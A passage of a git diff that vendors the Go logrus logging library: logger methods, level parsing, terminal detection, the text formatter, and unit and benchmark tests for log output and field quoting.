a mutex. It's common to set this to a + // file, or leave it default which is `os.Stderr`. You can also set this to + // something more adventorous, such as logging to Kafka. + Out io.Writer + // Hooks for the logger instance. These allow firing events based on logging + // levels and log entries. For example, to send errors to an error tracking + // service, log to StatsD or dump the core on fatal errors. + Hooks LevelHooks + // All log entries pass through the formatter before logged to Out. The + // included formatters are `TextFormatter` and `JSONFormatter` for which + // TextFormatter is the default. In development (when a TTY is attached) it + // logs with colors, but to a file it wouldn't. You can easily implement your + // own that implements the `Formatter` interface, see the `README` or included + // formatters for examples. + Formatter Formatter + // The logging level the logger should log at. This is typically (and defaults + // to) `logrus.Info`, which allows Info(), Warn(), Error() and Fatal() to be + // logged. + Level Level + // Used to sync writing to the log. Locking is enabled by Default + mu MutexWrap + // Reusable empty entry + entryPool sync.Pool +} + +type MutexWrap struct { + lock sync.Mutex + disabled bool +} + +func (mw *MutexWrap) Lock() { + if !mw.disabled { + mw.lock.Lock() + } +} + +func (mw *MutexWrap) Unlock() { + if !mw.disabled { + mw.lock.Unlock() + } +} + +func (mw *MutexWrap) Disable() { + mw.disabled = true +} + +// Creates a new logger. Configuration should be set by changing `Formatter`, +// `Out` and `Hooks` directly on the default logger instance. You can also just +// instantiate your own: +// +// var log = &Logger{ +// Out: os.Stderr, +// Formatter: new(JSONFormatter), +// Hooks: make(LevelHooks), +// Level: logrus.DebugLevel, +// } +// +// It's recommended to make this a global instance called `log`. +func New() *Logger { + return &Logger{ + Out: os.Stderr, + Formatter: new(TextFormatter), + Hooks: make(LevelHooks), + Level: InfoLevel, + } +} + +func (logger *Logger) newEntry() *Entry { + entry, ok := logger.entryPool.Get().(*Entry) + if ok { + return entry + } + return NewEntry(logger) +} + +func (logger *Logger) releaseEntry(entry *Entry) { + logger.entryPool.Put(entry) +} + +// Adds a field to the log entry, note that it doesn't log until you call +// Debug, Print, Info, Warn, Fatal or Panic. It only creates a log entry. +// If you want multiple fields, use `WithFields`. +func (logger *Logger) WithField(key string, value interface{}) *Entry { + entry := logger.newEntry() + defer logger.releaseEntry(entry) + return entry.WithField(key, value) +} + +// Adds a struct of fields to the log entry. All it does is call `WithField` for +// each `Field`. +func (logger *Logger) WithFields(fields Fields) *Entry { + entry := logger.newEntry() + defer logger.releaseEntry(entry) + return entry.WithFields(fields) +} + +// Add an error as single field to the log entry. All it does is call +// `WithError` for the given `error`. +func (logger *Logger) WithError(err error) *Entry { + entry := logger.newEntry() + defer logger.releaseEntry(entry) + return entry.WithError(err) +} + +func (logger *Logger) Debugf(format string, args ...interface{}) { + if logger.level() >= DebugLevel { + entry := logger.newEntry() + entry.Debugf(format, args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Infof(format string, args ...interface{}) { + if logger.level() >= InfoLevel { + entry := logger.newEntry() + entry.Infof(format, args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Printf(format string, args ...interface{}) { + entry := logger.newEntry() + entry.Printf(format, args...) + logger.releaseEntry(entry) +} + +func (logger *Logger) Warnf(format string, args ...interface{}) { + if logger.level() >= WarnLevel { + entry := logger.newEntry() + entry.Warnf(format, args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Warningf(format string, args ...interface{}) { + if logger.level() >= WarnLevel { + entry := logger.newEntry() + entry.Warnf(format, args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Errorf(format string, args ...interface{}) { + if logger.level() >= ErrorLevel { + entry := logger.newEntry() + entry.Errorf(format, args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Fatalf(format string, args ...interface{}) { + if logger.level() >= FatalLevel { + entry := logger.newEntry() + entry.Fatalf(format, args...) + logger.releaseEntry(entry) + } + Exit(1) +} + +func (logger *Logger) Panicf(format string, args ...interface{}) { + if logger.level() >= PanicLevel { + entry := logger.newEntry() + entry.Panicf(format, args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Debug(args ...interface{}) { + if logger.level() >= DebugLevel { + entry := logger.newEntry() + entry.Debug(args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Info(args ...interface{}) { + if logger.level() >= InfoLevel { + entry := logger.newEntry() + entry.Info(args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Print(args ...interface{}) { + entry := logger.newEntry() + entry.Info(args...) + logger.releaseEntry(entry) +} + +func (logger *Logger) Warn(args ...interface{}) { + if logger.level() >= WarnLevel { + entry := logger.newEntry() + entry.Warn(args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Warning(args ...interface{}) { + if logger.level() >= WarnLevel { + entry := logger.newEntry() + entry.Warn(args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Error(args ...interface{}) { + if logger.level() >= ErrorLevel { + entry := logger.newEntry() + entry.Error(args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Fatal(args ...interface{}) { + if logger.level() >= FatalLevel { + entry := logger.newEntry() + entry.Fatal(args...) + logger.releaseEntry(entry) + } + Exit(1) +} + +func (logger *Logger) Panic(args ...interface{}) { + if logger.level() >= PanicLevel { + entry := logger.newEntry() + entry.Panic(args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Debugln(args ...interface{}) { + if logger.level() >= DebugLevel { + entry := logger.newEntry() + entry.Debugln(args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Infoln(args ...interface{}) { + if logger.level() >= InfoLevel { + entry := logger.newEntry() + entry.Infoln(args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Println(args ...interface{}) { + entry := logger.newEntry() + entry.Println(args...) + logger.releaseEntry(entry) +} + +func (logger *Logger) Warnln(args ...interface{}) { + if logger.level() >= WarnLevel { + entry := logger.newEntry() + entry.Warnln(args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Warningln(args ...interface{}) { + if logger.level() >= WarnLevel { + entry := logger.newEntry() + entry.Warnln(args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Errorln(args ...interface{}) { + if logger.level() >= ErrorLevel { + entry := logger.newEntry() + entry.Errorln(args...) + logger.releaseEntry(entry) + } +} + +func (logger *Logger) Fatalln(args ...interface{}) { + if logger.level() >= FatalLevel { + entry := logger.newEntry() + entry.Fatalln(args...) + logger.releaseEntry(entry) + } + Exit(1) +} + +func (logger *Logger) Panicln(args ...interface{}) { + if logger.level() >= PanicLevel { + entry := logger.newEntry() + entry.Panicln(args...) + logger.releaseEntry(entry) + } +} + +//When file is opened with appending mode, it's safe to +//write concurrently to a file (within 4k message on Linux). +//In these cases user can choose to disable the lock. +func (logger *Logger) SetNoLock() { + logger.mu.Disable() +} + +func (logger *Logger) level() Level { + return Level(atomic.LoadUint32((*uint32)(&logger.Level))) +} + +func (logger *Logger) SetLevel(level Level) { + atomic.StoreUint32((*uint32)(&logger.Level), uint32(level)) +} + +func (logger *Logger) AddHook(hook Hook) { + logger.mu.Lock() + defer logger.mu.Unlock() + logger.Hooks.Add(hook) +} diff --git a/vendor/github.com/Sirupsen/logrus/logger_bench_test.go b/vendor/github.com/Sirupsen/logrus/logger_bench_test.go new file mode 100644 index 0000000000..dd23a3535e --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/logger_bench_test.go @@ -0,0 +1,61 @@ +package logrus + +import ( + "os" + "testing" +) + +// smallFields is a small size data set for benchmarking +var loggerFields = Fields{ + "foo": "bar", + "baz": "qux", + "one": "two", + "three": "four", +} + +func BenchmarkDummyLogger(b *testing.B) { + nullf, err := os.OpenFile("/dev/null", os.O_WRONLY, 0666) + if err != nil { + b.Fatalf("%v", err) + } + defer nullf.Close() + doLoggerBenchmark(b, nullf, &TextFormatter{DisableColors: true}, smallFields) +} + +func BenchmarkDummyLoggerNoLock(b *testing.B) { + nullf, err := os.OpenFile("/dev/null", os.O_WRONLY|os.O_APPEND, 0666) + if err != nil { + b.Fatalf("%v", err) + } + defer nullf.Close() + doLoggerBenchmarkNoLock(b, nullf, &TextFormatter{DisableColors: true}, smallFields) +} + +func doLoggerBenchmark(b *testing.B, out *os.File, formatter Formatter, fields Fields) { + logger := Logger{ + Out: out, + Level: InfoLevel, + Formatter: formatter, + } + entry := logger.WithFields(fields) + b.RunParallel(func(pb *testing.PB) { + for pb.Next() { + entry.Info("aaa") + } + }) +} + +func doLoggerBenchmarkNoLock(b *testing.B, out *os.File, formatter Formatter, fields Fields) { + logger := Logger{ + Out: out, + Level: InfoLevel, + Formatter: formatter, + } + logger.SetNoLock() + entry := logger.WithFields(fields) + b.RunParallel(func(pb *testing.PB) { + for pb.Next() { + entry.Info("aaa") + } + }) +} diff --git a/vendor/github.com/Sirupsen/logrus/logrus.go b/vendor/github.com/Sirupsen/logrus/logrus.go new file mode 100644 index 0000000000..dd38999741 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/logrus.go @@ -0,0 +1,143 @@ +package logrus + +import ( + "fmt" + "log" + "strings" +) + +// Fields type, used to pass to `WithFields`. +type Fields map[string]interface{} + +// Level type +type Level uint32 + +// Convert the Level to a string. E.g. PanicLevel becomes "panic". +func (level Level) String() string { + switch level { + case DebugLevel: + return "debug" + case InfoLevel: + return "info" + case WarnLevel: + return "warning" + case ErrorLevel: + return "error" + case FatalLevel: + return "fatal" + case PanicLevel: + return "panic" + } + + return "unknown" +} + +// ParseLevel takes a string level and returns the Logrus log level constant. +func ParseLevel(lvl string) (Level, error) { + switch strings.ToLower(lvl) { + case "panic": + return PanicLevel, nil + case "fatal": + return FatalLevel, nil + case "error": + return ErrorLevel, nil + case "warn", "warning": + return WarnLevel, nil + case "info": + return InfoLevel, nil + case "debug": + return DebugLevel, nil + } + + var l Level + return l, fmt.Errorf("not a valid logrus Level: %q", lvl) +} + +// A constant exposing all logging levels +var AllLevels = []Level{ + PanicLevel, + FatalLevel, + ErrorLevel, + WarnLevel, + InfoLevel, + DebugLevel, +} + +// These are the different logging levels. You can set the logging level to log +// on your instance of logger, obtained with `logrus.New()`. +const ( + // PanicLevel level, highest level of severity. Logs and then calls panic with the + // message passed to Debug, Info, ... + PanicLevel Level = iota + // FatalLevel level. Logs and then calls `os.Exit(1)`. It will exit even if the + // logging level is set to Panic. + FatalLevel + // ErrorLevel level. Logs. Used for errors that should definitely be noted. + // Commonly used for hooks to send errors to an error tracking service. + ErrorLevel + // WarnLevel level. Non-critical entries that deserve eyes. + WarnLevel + // InfoLevel level. General operational entries about what's going on inside the + // application. + InfoLevel + // DebugLevel level. Usually only enabled when debugging. Very verbose logging. + DebugLevel +) + +// Won't compile if StdLogger can't be realized by a log.Logger +var ( + _ StdLogger = &log.Logger{} + _ StdLogger = &Entry{} + _ StdLogger = &Logger{} +) + +// StdLogger is what your logrus-enabled library should take, that way +// it'll accept a stdlib logger and a logrus logger. There's no standard +// interface, this is the closest we get, unfortunately. +type StdLogger interface { + Print(...interface{}) + Printf(string, ...interface{}) + Println(...interface{}) + + Fatal(...interface{}) + Fatalf(string, ...interface{}) + Fatalln(...interface{}) + + Panic(...interface{}) + Panicf(string, ...interface{}) + Panicln(...interface{}) +} + +// The FieldLogger interface generalizes the Entry and Logger types +type FieldLogger interface { + WithField(key string, value interface{}) *Entry + WithFields(fields Fields) *Entry + WithError(err error) *Entry + + Debugf(format string, args ...interface{}) + Infof(format string, args ...interface{}) + Printf(format string, args ...interface{}) + Warnf(format string, args ...interface{}) + Warningf(format string, args ...interface{}) + Errorf(format string, args ...interface{}) + Fatalf(format string, args ...interface{}) + Panicf(format string, args ...interface{}) + + Debug(args ...interface{}) + Info(args ...interface{}) + Print(args ...interface{}) + Warn(args ...interface{}) + Warning(args ...interface{}) + Error(args ...interface{}) + Fatal(args ...interface{}) + Panic(args ...interface{}) + + Debugln(args ...interface{}) + Infoln(args ...interface{}) + Println(args ...interface{}) + Warnln(args ...interface{}) + Warningln(args ...interface{}) + Errorln(args ...interface{}) + Fatalln(args ...interface{}) + Panicln(args ...interface{}) +} diff --git a/vendor/github.com/Sirupsen/logrus/logrus_test.go b/vendor/github.com/Sirupsen/logrus/logrus_test.go new file mode 100644 index 0000000000..78cbc28259 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/logrus_test.go @@ -0,0 +1,386 @@ +package logrus + +import ( + "bytes" + "encoding/json" + "strconv" + "strings" + "sync" + "testing" + + "github.com/stretchr/testify/assert" +) + +func LogAndAssertJSON(t *testing.T, log func(*Logger), assertions func(fields Fields)) { + var buffer bytes.Buffer + var fields Fields + + logger := New() + logger.Out = &buffer + logger.Formatter = new(JSONFormatter) + + log(logger) + + err := json.Unmarshal(buffer.Bytes(), &fields) + assert.Nil(t, err) + + assertions(fields) +} + +func LogAndAssertText(t *testing.T, log func(*Logger), assertions func(fields map[string]string)) { + var buffer bytes.Buffer + + logger := New() + logger.Out = &buffer + logger.Formatter = &TextFormatter{ + DisableColors: true, + } + + log(logger) + + fields := make(map[string]string) + for _, kv := range strings.Split(buffer.String(), " ") { + if !strings.Contains(kv, "=") { + continue + } + kvArr := strings.Split(kv, "=") + key := strings.TrimSpace(kvArr[0]) + val := kvArr[1] + if kvArr[1][0] == '"' { + var err error + val, err = strconv.Unquote(val) + assert.NoError(t, err) + } + fields[key] = val + } + assertions(fields) +} + +func TestPrint(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.Print("test") + }, func(fields Fields) { + assert.Equal(t, fields["msg"], "test") + assert.Equal(t, fields["level"], "info") + }) +} + +func TestInfo(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.Info("test") + }, func(fields Fields) { + assert.Equal(t, fields["msg"], "test") + assert.Equal(t, fields["level"], "info") + }) +} + +func TestWarn(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.Warn("test") + }, func(fields Fields) { + assert.Equal(t, fields["msg"], "test") + assert.Equal(t, fields["level"], "warning") + }) +} + +func TestInfolnShouldAddSpacesBetweenStrings(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.Infoln("test", "test") + }, func(fields Fields) { + assert.Equal(t, fields["msg"], "test test") + }) +} + +func TestInfolnShouldAddSpacesBetweenStringAndNonstring(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.Infoln("test", 10) + }, func(fields Fields) { + assert.Equal(t, fields["msg"], "test 10") + }) +} + +func TestInfolnShouldAddSpacesBetweenTwoNonStrings(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.Infoln(10, 10) + }, func(fields Fields) { + assert.Equal(t, fields["msg"], "10 10") + }) +} + +func TestInfoShouldAddSpacesBetweenTwoNonStrings(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.Infoln(10, 10) + }, func(fields Fields) { + assert.Equal(t, fields["msg"], "10 10") + }) +} + +func TestInfoShouldNotAddSpacesBetweenStringAndNonstring(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.Info("test", 10) + }, func(fields Fields) { + assert.Equal(t, fields["msg"], "test10") + }) +} + +func TestInfoShouldNotAddSpacesBetweenStrings(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.Info("test", "test") + }, func(fields Fields) { + assert.Equal(t, fields["msg"], "testtest") + }) +} + +func TestWithFieldsShouldAllowAssignments(t *testing.T) { + var buffer bytes.Buffer + var fields Fields + + logger := New() + logger.Out = &buffer + logger.Formatter = new(JSONFormatter) + + localLog := logger.WithFields(Fields{ + "key1": "value1", + }) + + localLog.WithField("key2", "value2").Info("test") + err := json.Unmarshal(buffer.Bytes(), &fields) + assert.Nil(t, err) + + assert.Equal(t, "value2", fields["key2"]) + assert.Equal(t, "value1", fields["key1"]) + + buffer = bytes.Buffer{} + fields = Fields{} + localLog.Info("test") + err = json.Unmarshal(buffer.Bytes(), &fields) + assert.Nil(t, err) + + _, ok := fields["key2"] + assert.Equal(t, false, ok) + assert.Equal(t, "value1", fields["key1"]) +} + +func TestUserSuppliedFieldDoesNotOverwriteDefaults(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.WithField("msg", "hello").Info("test") + }, func(fields Fields) { + assert.Equal(t, fields["msg"], "test") + }) +} + +func TestUserSuppliedMsgFieldHasPrefix(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.WithField("msg", "hello").Info("test") + }, func(fields Fields) { + assert.Equal(t, fields["msg"], "test") + assert.Equal(t, fields["fields.msg"], "hello") + }) +} + +func TestUserSuppliedTimeFieldHasPrefix(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.WithField("time", "hello").Info("test") + }, func(fields Fields) { + assert.Equal(t, fields["fields.time"], "hello") + }) +} + +func TestUserSuppliedLevelFieldHasPrefix(t *testing.T) { + LogAndAssertJSON(t, func(log *Logger) { + log.WithField("level", 1).Info("test") + }, func(fields Fields) { + assert.Equal(t, fields["level"], "info") + assert.Equal(t, fields["fields.level"], 1.0) // JSON has floats only + }) +} + +func TestDefaultFieldsAreNotPrefixed(t *testing.T) { + LogAndAssertText(t, func(log *Logger) { + ll := log.WithField("herp", "derp") + ll.Info("hello") + ll.Info("bye") + }, func(fields map[string]string) { + for _, fieldName := range []string{"fields.level", "fields.time", "fields.msg"} { + if _, ok := fields[fieldName]; ok { + t.Fatalf("should not have prefixed %q: %v", fieldName, fields) + } + } + }) +} + +func TestDoubleLoggingDoesntPrefixPreviousFields(t *testing.T) { + + var buffer bytes.Buffer + var fields Fields + + logger := New() + logger.Out = &buffer + logger.Formatter = new(JSONFormatter) + + llog := logger.WithField("context", "eating raw fish") + + llog.Info("looks delicious") + + err := json.Unmarshal(buffer.Bytes(), &fields) + assert.NoError(t, err, "should have decoded first message") + assert.Equal(t, len(fields), 4, "should only have msg/time/level/context fields") + assert.Equal(t, fields["msg"], "looks delicious") + assert.Equal(t, fields["context"], "eating raw fish") + + buffer.Reset() + + llog.Warn("omg it is!") + + err = json.Unmarshal(buffer.Bytes(), &fields) + assert.NoError(t, err, "should have decoded second message") + assert.Equal(t, len(fields), 4, "should only have msg/time/level/context fields") + assert.Equal(t, fields["msg"], "omg it is!") + assert.Equal(t, fields["context"], "eating raw fish") + assert.Nil(t, fields["fields.msg"], "should not have prefixed previous `msg` entry") + +} + +func TestConvertLevelToString(t *testing.T) { + assert.Equal(t, "debug", DebugLevel.String()) + assert.Equal(t, "info", InfoLevel.String()) + assert.Equal(t, "warning", WarnLevel.String()) + assert.Equal(t, "error", ErrorLevel.String()) + assert.Equal(t, "fatal", FatalLevel.String()) + assert.Equal(t, "panic", PanicLevel.String()) +} + +func TestParseLevel(t *testing.T) { + l, err := ParseLevel("panic") + assert.Nil(t, err) + assert.Equal(t, PanicLevel, l) + + l, err = ParseLevel("PANIC") + assert.Nil(t, err) + assert.Equal(t, PanicLevel, l) + + l, err = ParseLevel("fatal") + assert.Nil(t, err) + assert.Equal(t, FatalLevel, l) + + l, err = ParseLevel("FATAL") + assert.Nil(t, err) + assert.Equal(t, FatalLevel, l) + + l, err = ParseLevel("error") + assert.Nil(t, err) + assert.Equal(t, ErrorLevel, l) + + l, err = ParseLevel("ERROR") + assert.Nil(t, err) + assert.Equal(t, ErrorLevel, l) + + l, err = ParseLevel("warn") + assert.Nil(t, err) + assert.Equal(t, WarnLevel, l) + + l, err = ParseLevel("WARN") + assert.Nil(t, err) + assert.Equal(t, WarnLevel, l) + + l, err = ParseLevel("warning") + assert.Nil(t, err) + assert.Equal(t, WarnLevel, l) + + l, err = ParseLevel("WARNING") + assert.Nil(t, err) + assert.Equal(t, WarnLevel, l) + + l, err = ParseLevel("info") + assert.Nil(t, err) + assert.Equal(t, InfoLevel, l) + + l, err = ParseLevel("INFO") + assert.Nil(t, err) + assert.Equal(t, InfoLevel, l) + + l, err = ParseLevel("debug") + assert.Nil(t, err) + assert.Equal(t, DebugLevel, l) + + l, err = ParseLevel("DEBUG") + assert.Nil(t, err) + assert.Equal(t, DebugLevel, l) + + l, err = ParseLevel("invalid") + assert.Equal(t, "not a valid logrus Level: \"invalid\"", err.Error()) +} + +func TestGetSetLevelRace(t *testing.T) { + wg := sync.WaitGroup{} + for i := 0; i < 100; i++ { + wg.Add(1) + go func(i int) { + defer wg.Done() + if i%2 == 0 { + SetLevel(InfoLevel) + } else { + GetLevel() + } + }(i) + + } + wg.Wait() +} + +func TestLoggingRace(t *testing.T) { + logger := New() + + var wg sync.WaitGroup + wg.Add(100) + + for i := 0; i < 100; i++ { + go func() { + logger.Info("info") + wg.Done() + }() + } + wg.Wait() +} + +// Compile test +func TestLogrusInterface(t *testing.T) { + var buffer bytes.Buffer + fn := func(l FieldLogger) { + b := l.WithField("key", "value") + b.Debug("Test") + } + // test logger + logger := New() + logger.Out = &buffer + fn(logger) + + // test Entry + e := logger.WithField("another", "value") + fn(e) +} + +// Implements io.Writer using channels for synchronization, so we can wait on +// the Entry.Writer goroutine to write in a non-racey way. This does assume that +// there is a single call to Logger.Out for each message. +type channelWriter chan []byte + +func (cw channelWriter) Write(p []byte) (int, error) { + cw <- p + return len(p), nil +} + +func TestEntryWriter(t *testing.T) { + cw := channelWriter(make(chan []byte, 1)) + log := New() + log.Out = cw + log.Formatter = new(JSONFormatter) + log.WithField("foo", "bar").WriterLevel(WarnLevel).Write([]byte("hello\n")) + + bs := <-cw + var fields Fields + err := json.Unmarshal(bs, &fields) + assert.Nil(t, err) + assert.Equal(t, fields["foo"], "bar") + assert.Equal(t, fields["level"], "warning") +} diff --git a/vendor/github.com/Sirupsen/logrus/terminal_bsd.go b/vendor/github.com/Sirupsen/logrus/terminal_bsd.go new file mode 100644 index 0000000000..4880d13d26 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/terminal_bsd.go @@ -0,0 +1,10 @@ +// +build darwin freebsd openbsd netbsd dragonfly +// +build !appengine,!gopherjs + +package logrus + +import "golang.org/x/sys/unix" + +const ioctlReadTermios = unix.TIOCGETA + +type Termios unix.Termios diff --git a/vendor/github.com/Sirupsen/logrus/terminal_check_appengine.go b/vendor/github.com/Sirupsen/logrus/terminal_check_appengine.go new file mode 100644 index 0000000000..3de08e802f --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/terminal_check_appengine.go @@ -0,0 +1,11 @@ +// +build appengine gopherjs + +package logrus + +import ( + "io" +) + +func checkIfTerminal(w io.Writer) bool { + return true +} diff --git a/vendor/github.com/Sirupsen/logrus/terminal_check_notappengine.go b/vendor/github.com/Sirupsen/logrus/terminal_check_notappengine.go new file mode 100644 index 0000000000..067047a123 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/terminal_check_notappengine.go @@ -0,0 +1,19 @@ +// +build !appengine,!gopherjs + +package logrus + +import ( + "io" + "os" + + "golang.org/x/crypto/ssh/terminal" +) + +func checkIfTerminal(w io.Writer) bool { + switch v := w.(type) { + case *os.File: + return terminal.IsTerminal(int(v.Fd())) + default: + return false + } +} diff --git a/vendor/github.com/Sirupsen/logrus/terminal_linux.go b/vendor/github.com/Sirupsen/logrus/terminal_linux.go new file mode 100644 index 0000000000..f29a0097c8 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/terminal_linux.go @@ -0,0 +1,14 @@ +// Based on ssh/terminal: +// Copyright 2013 The Go Authors. All rights reserved. +// Use of this source code is governed by a BSD-style +// license that can be found in the LICENSE file. + +// +build !appengine,!gopherjs + +package logrus + +import "golang.org/x/sys/unix" + +const ioctlReadTermios = unix.TCGETS + +type Termios unix.Termios diff --git a/vendor/github.com/Sirupsen/logrus/text_formatter.go b/vendor/github.com/Sirupsen/logrus/text_formatter.go new file mode 100644 index 0000000000..61b21caea4 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/text_formatter.go @@ -0,0 +1,178 @@ +package logrus + +import ( + "bytes" + "fmt" + "sort" + "strings" + "sync" + "time" +) + +const ( + nocolor = 0 + red = 31 + green = 32 + yellow = 33 + blue = 36 + gray = 37 +) + +var ( + baseTimestamp time.Time +) + +func init() { + baseTimestamp = time.Now() +} + +// TextFormatter formats logs into text +type TextFormatter struct { + // Set to true to bypass checking for a TTY before outputting colors. + ForceColors bool + + // Force disabling colors. + DisableColors bool + + // Disable timestamp logging. useful when output is redirected to logging + // system that already adds timestamps. + DisableTimestamp bool + + // Enable logging the full timestamp when a TTY is attached instead of just + // the time passed since beginning of execution. + FullTimestamp bool + + // TimestampFormat to use for display when a full timestamp is printed + TimestampFormat string + + // The fields are sorted by default for a consistent output. For applications + // that log extremely frequently and don't use the JSON formatter this may not + // be desired. + DisableSorting bool + + // QuoteEmptyFields will wrap empty fields in quotes if true + QuoteEmptyFields bool + + // Whether the logger's out is to a terminal + isTerminal bool + + sync.Once +} + +func (f *TextFormatter) init(entry *Entry) { + if entry.Logger != nil { + f.isTerminal = checkIfTerminal(entry.Logger.Out) + } +} + +// Format renders a single log entry +func (f *TextFormatter) Format(entry *Entry) ([]byte, error) { + var b *bytes.Buffer + keys := make([]string, 0, len(entry.Data)) + for k := range entry.Data { + keys = append(keys, k) + } + + if !f.DisableSorting { + sort.Strings(keys) + } + if entry.Buffer != nil { + b = entry.Buffer + } else { + b = &bytes.Buffer{} + } + + prefixFieldClashes(entry.Data) + + f.Do(func() { f.init(entry) }) + + isColored := (f.ForceColors || f.isTerminal) && !f.DisableColors + + timestampFormat := f.TimestampFormat + if timestampFormat == "" { + timestampFormat = defaultTimestampFormat + } + if isColored { + f.printColored(b, entry, keys, timestampFormat) + } else { + if !f.DisableTimestamp { + f.appendKeyValue(b, "time", entry.Time.Format(timestampFormat)) + } + f.appendKeyValue(b, "level", entry.Level.String()) + if entry.Message != "" { + f.appendKeyValue(b, "msg", entry.Message) + } + for _, key := range keys { + f.appendKeyValue(b, key, entry.Data[key]) + } + } + + b.WriteByte('\n') + return b.Bytes(), nil +} + +func (f *TextFormatter) printColored(b *bytes.Buffer, entry *Entry, keys []string, timestampFormat string) { + var levelColor int + switch entry.Level { + case DebugLevel: + levelColor = gray + case WarnLevel: + levelColor = yellow + case ErrorLevel, FatalLevel, PanicLevel: + levelColor = red + default: + levelColor = blue + } + + levelText := strings.ToUpper(entry.Level.String())[0:4] + + if f.DisableTimestamp { + fmt.Fprintf(b, "\x1b[%dm%s\x1b[0m %-44s ", levelColor, levelText, entry.Message) + } else if !f.FullTimestamp { + fmt.Fprintf(b, "\x1b[%dm%s\x1b[0m[%04d] %-44s ", levelColor, levelText, int(entry.Time.Sub(baseTimestamp)/time.Second), entry.Message) + } else { + fmt.Fprintf(b, "\x1b[%dm%s\x1b[0m[%s] %-44s ", levelColor, levelText, entry.Time.Format(timestampFormat), entry.Message) + } + for _, k := range keys { + v := entry.Data[k] + fmt.Fprintf(b, " \x1b[%dm%s\x1b[0m=", levelColor, k) + f.appendValue(b, v) + } +} + +func (f *TextFormatter) needsQuoting(text string) bool { + if f.QuoteEmptyFields && len(text) == 0 { + return true + } + for _, ch := range text { + if !((ch >= 'a' && ch <= 'z') || + (ch >= 'A' && ch <= 'Z') || + (ch >= '0' && ch <= '9') || + ch == '-' || ch == '.' || ch == '_' || ch == '/' || ch == '@' || ch == '^' || ch == '+') { + return true + } + } + return false +} + +func (f *TextFormatter) appendKeyValue(b *bytes.Buffer, key string, value interface{}) { + if b.Len() > 0 { + b.WriteByte(' ') + } + b.WriteString(key) + b.WriteByte('=') + f.appendValue(b, value) +} + +func (f *TextFormatter) appendValue(b *bytes.Buffer, value interface{}) { + stringVal, ok := value.(string) + if !ok { + stringVal = fmt.Sprint(value) + } + + if !f.needsQuoting(stringVal) { + b.WriteString(stringVal) + } else { + b.WriteString(fmt.Sprintf("%q", stringVal)) + } +} diff --git a/vendor/github.com/Sirupsen/logrus/text_formatter_test.go b/vendor/github.com/Sirupsen/logrus/text_formatter_test.go new file mode 100644 index 0000000000..d93b931e51 --- /dev/null +++ b/vendor/github.com/Sirupsen/logrus/text_formatter_test.go @@ -0,0 +1,141 @@ +package logrus + +import ( + "bytes" + "errors" + "fmt" + "strings" + "testing" + "time" +) + +func TestFormatting(t *testing.T) { + tf := &TextFormatter{DisableColors: true} + + testCases := []struct { + value string + expected string + }{ + {`foo`, "time=\"0001-01-01T00:00:00Z\" level=panic test=foo\n"}, + } + + for _, tc := range testCases { + b, _ := tf.Format(WithField("test", tc.value)) + + if string(b) != tc.expected { + t.Errorf("formatting expected for %q (result was %q instead of %q)", tc.value, string(b), tc.expected) + } + } +} + +func TestQuoting(t *testing.T) { + tf := &TextFormatter{DisableColors: true} + + checkQuoting := func(q bool, value interface{}) { + b, _ := tf.Format(WithField("test", value)) + idx := bytes.Index(b, ([]byte)("test=")) + cont := bytes.Contains(b[idx+5:], []byte("\"")) + if cont != q { + if q { + t.Errorf("quoting expected for: %#v", value) + } else { + t.Errorf("quoting not expected for: %#v", value) + } + } + } + + checkQuoting(false, "") + checkQuoting(false, "abcd") + checkQuoting(false, "v1.0") + checkQuoting(false, "1234567890") + checkQuoting(false, "/foobar") + checkQuoting(false, "foo_bar") + checkQuoting(false, "foo@bar") + checkQuoting(false, "foobar^") + checkQuoting(false, "+/-_^@f.oobar") + checkQuoting(true, "foobar$") + checkQuoting(true, "&foobar") + checkQuoting(true, "x y") + checkQuoting(true, "x,y") + checkQuoting(false, errors.New("invalid")) + checkQuoting(true, errors.New("invalid argument")) + + // Test for quoting empty fields. + tf.QuoteEmptyFields = true + checkQuoting(true, "") + checkQuoting(false, "abcd") + checkQuoting(true, errors.New("invalid argument")) +} + +func TestEscaping(t *testing.T) { + tf := &TextFormatter{DisableColors: true} + + testCases := []struct { + value string + expected string + }{ + {`ba"r`, `ba\"r`}, + {`ba'r`, `ba'r`}, + } + + for _, tc := range testCases { + b, _ := tf.Format(WithField("test", tc.value)) + if !bytes.Contains(b, []byte(tc.expected)) { + t.Errorf("escaping expected for %q (result was %q instead of %q)", tc.value, string(b), tc.expected) + } + } +} + +func TestEscaping_Interface(t *testing.T) { + tf := 